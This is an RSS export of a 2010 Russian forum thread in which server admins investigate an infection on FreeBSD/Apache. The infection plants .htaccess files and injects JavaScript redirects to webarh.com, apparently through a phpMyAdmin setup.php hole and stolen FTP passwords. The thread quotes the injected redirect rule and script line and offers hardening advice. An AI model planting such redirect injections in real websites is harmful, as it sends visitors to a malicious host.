<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Взлом через подмену htaccess</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html</link>
    <description>Система  FreeBSD 7.0-RELEASE&lt;br&gt;Сервер: Apache 2.2.6_2&lt;br&gt;&lt;br&gt;На сервере живёт зоопарк сайтов (это не хостинг, но всё же) и несколько разных систем управления всем этим.&lt;br&gt;&lt;br&gt;Последние несколько дней раз в сутки во всех директориях на сервере появляется файлик&lt;br&gt;.htaccess следующего содержания:&lt;br&gt;&lt;br&gt;RewriteEngine On^M&lt;br&gt;RewriteBase /^M&lt;br&gt;RewriteRule ^(.*)? http://webarh.com/r.php&lt;br&gt;&lt;br&gt;Имя сайта может быть любым. Главное что редирект на r.php куда-то.&lt;br&gt;&lt;br&gt;В логах по всем сайтам ничего толкового найти не могу. То есть нигде нет добавления этого файла.&lt;br&gt;&lt;br&gt;Файл идёт с правами апача в те директории, куда апачу разрешена запись (аплоад) по тем или иным причинам.&lt;br&gt;Редирект на &quot;хостинге&quot; нужен.&lt;br&gt;&lt;br&gt;Помогите отловить проблему. С какой стороны, хотя бы, к ней подойти.&lt;br&gt;&lt;br&gt;Догадываюсь что вопрос чайницкий...&lt;br&gt;</description>

<item>
    <title>Взлом через подмену htaccess (universite)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#17</link>
    <pubDate>Thu, 04 Nov 2010 21:12:17 GMT</pubDate>
    <description>&lt;br&gt;&amp;gt;&amp;gt; далее начинай внимательно изучать&lt;br&gt;&amp;gt; Вот не могу понять на что смотреть. Что выловить.&lt;br&gt;&lt;br&gt;читай логи фтп-сервера&lt;br&gt;я в подобных случаях цеплял фильтр по названию файлов и банил атакующие IP&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Взлом через подмену htaccess (DJ Kill)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#16</link>
    <pubDate>Mon, 18 Oct 2010 19:31:29 GMT</pubDate>
    <description>&amp;gt; как успехи?&lt;br&gt;&lt;br&gt;В общем, после обновки админа повторения нет.&lt;br&gt;Левых файлов в структуре сайтов нет.&lt;br&gt;Кроме htaccess и правки индексов - никаких других вмешательств.&lt;br&gt;</description>
</item>

<item>
    <title>Взлом через подмену htaccess (Pearl Diver)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#15</link>
    <pubDate>Mon, 18 Oct 2010 15:31:29 GMT</pubDate>
    <description>как успехи?&lt;br&gt;&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Взлом через подмену htaccess (DJ_Kill)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#14</link>
    <pubDate>Mon, 18 Oct 2010 06:45:23 GMT</pubDate>
    <description>&amp;gt; 1) он использует уязвимость в phpmyadmin/scripts/setup.php&lt;br&gt;&lt;br&gt;Именно.&lt;br&gt;&lt;br&gt;&amp;gt; 2.3) В некоторых местах оставляет штампы вида&lt;br&gt;&amp;gt; 3) ВАЖНО!!!&lt;br&gt;&lt;br&gt;Вот это интересно. Проверю.&lt;br&gt;&lt;br&gt;&amp;gt; P.S. Какая версия phpmyadmin этому подвержена - х.з. Снес ее не подумавши...&lt;br&gt;&amp;gt; :(&lt;br&gt;&lt;br&gt;Вся ветка 2.х.&lt;br&gt;Часть веток кроме последних 2 или 3 от 3.Х&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Взлом через подмену htaccess (Pearl Diver)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#13</link>
    <pubDate>Mon, 18 Oct 2010 06:38:39 GMT</pubDate>
    <description>&amp;gt;&#091;оверквотинг удален&#093;&lt;br&gt;&amp;gt; RewriteBase /^M&lt;br&gt;&amp;gt; RewriteRule ^(.*)? http://webarh.com/r.php&lt;br&gt;&amp;gt; Имя сайта может быть любым. Главное что редирект на r.php куда-то.&lt;br&gt;&amp;gt; В логах по всем сайтам ничего толкового найти не могу. То есть&lt;br&gt;&amp;gt; нигде нет добавления этого файла.&lt;br&gt;&amp;gt; Файл идёт с правами апача в те директории, куда апачу разрешена запись&lt;br&gt;&amp;gt; (аплоад) по тем или иным причинам.&lt;br&gt;&amp;gt; Редирект на &quot;хостинге&quot; нужен.&lt;br&gt;&amp;gt; Помогите отловить проблему. С какой стороны, хотя бы, к ней подойти.&lt;br&gt;&amp;gt; Догадываюсь что вопрос чайницкий...&lt;br&gt;&lt;br&gt;Сегодня пол-ночи гоняли этого виря в одной из виртуалок.&lt;br&gt;4 раза зачищали сайт, не могли понять -- где это дрянь пролезает.&lt;br&gt;&lt;br&gt;Обнаружили что&lt;br&gt;1) он использует уязвимость в phpmyadmin/scripts/setup.php&lt;br&gt;2.1) разбрасывает везде .htaccess вышеуказанного содержания&lt;br&gt;2.2) заражает все *.php *.htm *.html файлы строками вида&lt;br&gt;&amp;lt;script&amp;gt;document.location.href=&apos;http://webarh.com/z.php&apos;;&amp;lt;/script&amp;gt;&lt;br&gt;2.3) В некоторых местах оставляет штампы вида&lt;br&gt;HTML  HEAD&lt;br&gt;TITLE This site is defaced!!! /TITLE&lt;br&gt;/HEAD BODY bgcolo</description>
</item>

<item>
    <title>Взлом через подмену htaccess (Pahanivo)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#12</link>
    <pubDate>Sun, 17 Oct 2010 09:08:59 GMT</pubDate>
    <description>&amp;gt; Очень помогает выкинуть ftp, и использовать sftp, или, на крайний случай, ftps.&lt;br&gt;&lt;br&gt;до тех пор пока боты не поумнели? ))&lt;br&gt;&amp;gt; Так же, еще больше помогает выкинуть Windows с рабочего места :)&lt;br&gt;&lt;br&gt;это да ))&lt;br&gt;&lt;br&gt;против криворукова юзераста, который годами игнорирует присутствие троянов на собственной машине все бесполезно )))&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Взлом через подмену htaccess (sHaggY_caT)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#11</link>
    <pubDate>Fri, 15 Oct 2010 20:55:21 GMT</pubDate>
    <description>&amp;gt;&amp;gt; safe_mode on&lt;br&gt;&amp;gt;&amp;gt; safe_mode_gid on&lt;br&gt;&amp;gt; Я вот это глобально для всего PHP включил&lt;br&gt;&lt;br&gt;safe mode ничего не дает, это иллюзия безопасности, так как запросто обходится. В PHP 6 его уже не будет именно по причине бесполезности!&lt;br&gt;Кроме того, safe_mode откровенно глючит с кучей CMS, и официально не рекомендуется теми же Joomla, Drupal, да, наверное, вообще практически всеми популярными CMS!&lt;br&gt;То есть, от него _нет_ пользы(разве что, на взлом потребуется чуть-чуть больше времени), но есть вред.&lt;br&gt;&lt;br&gt;По-настоящему помогают только open_base_dir, отключение ненужных функций PHP,  сухосин-патч и mod_security. Первый маст-хэв вообще везде (если нужен ImageMagick, convert запросто включается в дополнительный path через двоеточие), второе крайне желательно тоже везде (во всяком случае, хосты, для которых слишком много разрешено функций стоит вынести на отдельную виртуалку или контейнер), сухосин-патч обозначает тормоза (не годно для хостинга), а мод_секюрити требует утомительной ручной настройки.&lt;br&gt;&lt;br&gt;&amp;gt;&amp;gt; также лучше временно запр</description>
</item>

<item>
    <title>Взлом через подмену htaccess (sHaggY_caT)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#10</link>
    <pubDate>Fri, 15 Oct 2010 20:45:43 GMT</pubDate>
    <description>&amp;gt; вообще для ftp доступа крайне рекомендую использовать фильтрацию по айпи персонально по&lt;br&gt;&amp;gt; аккаунтам - к сожалению очень часто трояны воруют пасы клиентов&lt;br&gt;&lt;br&gt;Не часто, а это 99 и еще не одна девятка процентов во всех случаях взломов. &lt;br&gt;Через дыры в CMS ломают гораздо реже!&lt;br&gt;&lt;br&gt;Могу утверждать это, так как два года работала в одном из самых крупных хостингов рунета (несколько тысяч серверов)&lt;br&gt;&lt;br&gt;Ограничение по IP работает не всегда, так как часто бот заливает вирусные вставки и другую гадость прямо со взломанной машины, не передавая логин/пароль в ботнет.&lt;br&gt;&lt;br&gt;Очень помогает выкинуть ftp, и использовать sftp, или, на крайний случай, ftps.&lt;br&gt;Так же, еще больше помогает выкинуть Windows с рабочего места :) &lt;br&gt;&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Взлом через подмену htaccess (Pahanivo)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID8/7017.html#9</link>
    <pubDate>Tue, 12 Oct 2010 12:48:44 GMT</pubDate>
    <description>&amp;gt;&#091;оверквотинг удален&#093;&lt;br&gt;&amp;gt;&amp;gt; А это уже сама система была бы сломана, что не так.&lt;br&gt;&amp;gt; Запросто. Года два назад была эпидемия этого вируса (лень искать имя) -&lt;br&gt;&amp;gt; ворует FTP пароли у клиентов (одного достаточно). Далее вредоносный код в&lt;br&gt;&amp;gt; php-скрипт, который запускается от имени апача - вуаля, и все файлы,&lt;br&gt;&amp;gt; куда пользователь апача может писать становятся доступны.&lt;br&gt;&amp;gt; Лечится полным запретом FTP доступа (use SFTP + фильтрация по ip +&lt;br&gt;&amp;gt; рассылка всем пользователям, что у кого-то поселилась зараза) + выполнение рекомендаций&lt;br&gt;&amp;gt; Pahanivo.&lt;br&gt;&amp;gt;&amp;gt;&amp;gt; далее начинай внимательно изучать&lt;br&gt;&amp;gt;&amp;gt; Вот не могу понять на что смотреть. Что выловить.&lt;br&gt;&lt;br&gt;вообще для ftp доступа крайне рекомендую использовать фильтрацию по айпи персонально по аккаунтам - к сожалению очень часто трояны воруют пасы клиентов&lt;br&gt;</description>
</item>

</channel>
</rss>
